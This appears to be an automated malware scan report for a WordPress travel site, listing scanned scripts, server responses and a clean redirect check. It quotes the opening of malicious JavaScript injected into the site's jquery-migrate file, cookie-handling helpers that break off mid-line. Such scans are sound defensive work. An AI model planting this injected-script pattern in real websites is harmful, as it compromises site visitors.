Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=indinomads.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://indinomads.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 20 Sep 2014 13:54:26 GMT Pragma: no-cache Location: http://www.indinomads.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=1vru8undnv7taugdcd8tluuif3; path=/ X-Pingback: http://www.indinomads.com/xmlrpc.php | clean |
http://www.indinomads.com/ | 200 OK Content-Length: 55293 Content-Type: text/html | clean |
http://www.indinomads.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97290 Content-Type: text/javascript | clean |
http://www.indinomads.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8088 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( Antivirus reports:
| ||
http://www.indinomads.com/wp-content/plugins/pinterest-pin-it-button-for-images/ppibfi_pinterest.js?ver=3.9.2 | 200 OK Content-Length: 1388 Content-Type: text/javascript | clean |
http://www.indinomads.com/wp-content/plugins/simply-instagram/js/simply-instagram-jquery.prettyPhoto.js?ver=3.1.4 | 200 OK Content-Length: 25580 Content-Type: text/javascript | clean |
http://cdn.wibiya.com/Toolbars/dir_1420/Toolbar_1420928/Loader_1420928.js?ver=3.9.2 | 403 Forbidden Content-Length: 326 Content-Type: text/html | clean |
http://cdn.wibiya.com/test404page.js | 403 Forbidden Content-Length: 326 Content-Type: text/html | clean |
http://www.indinomads.com/wp-content/themes/canvas/includes/js/third-party.js?ver=3.9.2 | 200 OK Content-Length: 3658 Content-Type: text/javascript | clean |
http://www.indinomads.com/wp-content/themes/canvas/includes/js/modernizr.js?ver=2.6.2 | 200 OK Content-Length: 6141 Content-Type: text/javascript | clean |
http://www.indinomads.com/wp-content/themes/canvas/includes/js/jquery.flexslider.min.js?ver=3.9.2 | 200 OK Content-Length: 17265 Content-Type: text/javascript | clean |
http://www.indinomads.com/wp-content/themes/canvas/includes/js/general.js?ver=3.9.2 | 200 OK Content-Length: 5307 Content-Type: text/javascript | clean |
http://www.indinomads.com/wp-content/plugins/panopress/js/panopress.js?v=1.2 | 200 OK Content-Length: 20058 Content-Type: text/javascript | clean |
http://indinomads.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 20 Sep 2014 13:54:39 GMT Pragma: no-cache Location: http://www.indinomads.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=p4oc0mrilc6got9p8eft5uima6; path=/ X-Pingback: http://www.indinomads.com/xmlrpc.php | clean |
http://www.indinomads.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 32841 Content-Type: text/html | clean |
http://www.indinomads.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 20 Sep 2014 13:54:43 GMT Pragma: no-cache Location: http://www.indinomads.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=m2nmvbpt1e4h3ofadmpdp777k0; path=/ X-Pingback: http://www.indinomads.com/xmlrpc.php | clean |
http://api.twitter.com/1/statuses/user_timeline/indinomads.json?callback=twitterCallback2&count=2&include_rts=t | 403 Forbidden Content-Length: 75 Content-Type: application/javascript | clean |
http://www.indinomads.com/wp-content/plugins/bbpress/templates/default/js/editor.js?ver=2.5.4-5380 | 200 OK Content-Length: 1399 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: indinomads.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 13:54:26 GMT
Pragma: no-cache
Location: http://www.indinomads.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=1vru8undnv7taugdcd8tluuif3; path=/
X-Pingback: http://www.indinomads.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: indinomads.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 13:54:26 GMT
Pragma: no-cache
Location: http://www.indinomads.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=1vru8undnv7taugdcd8tluuif3; path=/
X-Pingback: http://www.indinomads.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: indinomads.com
Referer: http://www.google.com/search?q=indinomads.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: indinomads.com
Referer: http://www.google.com/search?q=indinomads.com
Result:
The result is similar to the first query. There are no suspicious redirects found.